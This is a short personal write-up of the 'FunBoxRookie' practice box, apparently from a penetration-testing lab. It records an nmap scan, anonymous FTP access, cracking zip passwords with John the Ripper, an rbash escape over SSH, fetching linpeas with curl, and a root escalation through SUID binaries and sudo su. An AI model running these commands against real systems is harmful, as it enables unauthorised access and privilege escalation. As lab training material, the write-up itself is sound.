🐧FunBoxRookie

IP : 192.168.84.107

Initial Scan

nmap 192.168.84.107 -p- -sV -A

Port 21 Enum

FTP is allowing anonymous login. Downloaded all zip files.

Port 80 Enum

Port 80 seems to be a dead end.

Shell

Found that each zip files was password protected. Ran zip2john *.zip > zipfile.hash to get a hash for each zip file. Ran John the Ripper against zipfile.hash john zipfile.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

Unable to connect via SSH with Cathrine's account. Connected via SSH with Tom ssh [email protected] -i id_rsa_tom ``Found local.txt flag in Tom's home folder. Rbash restricting commands

Found restricted Shell Bypass ssh [email protected] -i id_rsa_tom -t "bash --noprofile" Source : https://0xffsec.com/handbook/shells/restricted-shells/ Started python http server and grabbed Linpeas. curl http://192.168.49.84:8000/linpeas.sh -o linpeas.sh Changed linpeas.sh perms chmod 777 linpeas.sh

Got stuck at Priv Esc - Must get better at Priv Esc. Had to get hint to read mysql_history.

Files in Tom's home directory

Submitted hash in local.txt Read all files starting with . cat .* Found that there is a SQL entry with Tom's credentials in .mysql_history.

Linpeas found the initial stickied binaries but ran for good measure find / -perm -u=s -type f 2>/dev/null Source : https://medium.com/go-cyber/linux-privilege-escalation-with-suid-files-6119d73bc620

Found that su is stickied.

Root

sudo su

https://gtfobins.github.io/gtfobins/su/\

Also logged back in with SSH to the restricted shell to test the at sticky privilege escalation.

https://gtfobins.github.io/gtfobins/at/